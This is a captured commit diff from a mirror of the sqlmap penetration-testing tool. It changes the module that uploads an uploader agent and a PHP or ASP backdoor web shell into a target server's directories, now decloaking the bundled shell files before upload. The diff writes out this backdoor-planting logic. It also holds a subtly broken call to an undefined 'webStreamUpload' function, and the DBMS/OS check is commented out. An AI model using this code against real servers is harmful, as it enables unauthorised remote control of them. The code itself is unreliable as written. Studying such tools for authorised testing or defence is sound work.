mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-03 05:04:11 +03:00
modified a way to handle shell scripts
This commit is contained in:
parent
f91687c4f7
commit
e63428207c
|
@ -24,6 +24,7 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|||
|
||||
import os
|
||||
import re
|
||||
import StringIO
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import fileToStr
|
||||
|
@ -37,6 +38,7 @@ from lib.core.data import logger
|
|||
from lib.core.data import paths
|
||||
from lib.core.exception import sqlmapUnsupportedDBMSException
|
||||
from lib.core.shell import autoCompletion
|
||||
from extra.cloak.cloak import decloak
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
|
||||
|
@ -74,10 +76,13 @@ class Web:
|
|||
return output
|
||||
|
||||
def webFileUpload(self, fileToUpload, destFileName, directory):
|
||||
webStreamUpload(self, open(fileToUpload, "r"), destFileName, directory)
|
||||
|
||||
def webFileStreamUpload(self, stream, destFileName, directory):
|
||||
if self.webApi == "php":
|
||||
multipartParams = {
|
||||
"upload": "1",
|
||||
"file": open(fileToUpload, "r"),
|
||||
"file": stream,
|
||||
"uploadDir": directory,
|
||||
}
|
||||
page = Request.getPage(url=self.webUploaderUrl, multipart=multipartParams)
|
||||
|
@ -90,7 +95,7 @@ class Web:
|
|||
elif self.webApi == "asp":
|
||||
backdoorRemotePath = "%s/%s" % (directory, destFileName)
|
||||
backdoorRemotePath = os.path.normpath(backdoorRemotePath)
|
||||
backdoorContent = open(fileToUpload, "r").read()
|
||||
backdoorContent = stream.read()
|
||||
postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
|
||||
page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
|
||||
|
||||
|
@ -111,7 +116,7 @@ class Web:
|
|||
if self.webBackdoorUrl is not None and self.webUploaderUrl is not None and self.webApi is not None:
|
||||
return
|
||||
|
||||
self.checkDbmsOs()
|
||||
#self.checkDbmsOs()
|
||||
|
||||
kb.docRoot = getDocRoot()
|
||||
directories = getDirs()
|
||||
|
@ -150,10 +155,13 @@ class Web:
|
|||
logger.warn("invalid value, it must be 1 or 3")
|
||||
|
||||
backdoorName = "backdoor.%s" % self.webApi
|
||||
backdoorPath = os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName)
|
||||
backdoorStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
|
||||
|
||||
uploaderName = "uploader.%s" % self.webApi
|
||||
uploaderStr = fileToStr(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName))
|
||||
|
||||
uploaderStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')))
|
||||
|
||||
uploaderStr = uploaderStream.read()
|
||||
|
||||
for directory in directories:
|
||||
# Upload the uploader agent
|
||||
outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
|
||||
|
@ -182,7 +190,7 @@ class Web:
|
|||
infoMsg += "on '%s'" % directory
|
||||
logger.info(infoMsg)
|
||||
|
||||
self.webFileUpload(backdoorPath, backdoorName, directory)
|
||||
self.webFileStreamUpload(backdoorStream, backdoorName, directory)
|
||||
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
|
||||
self.webDirectory = directory
|
||||
|
||||
|
|
Loading…
Reference in New Issue
Block a user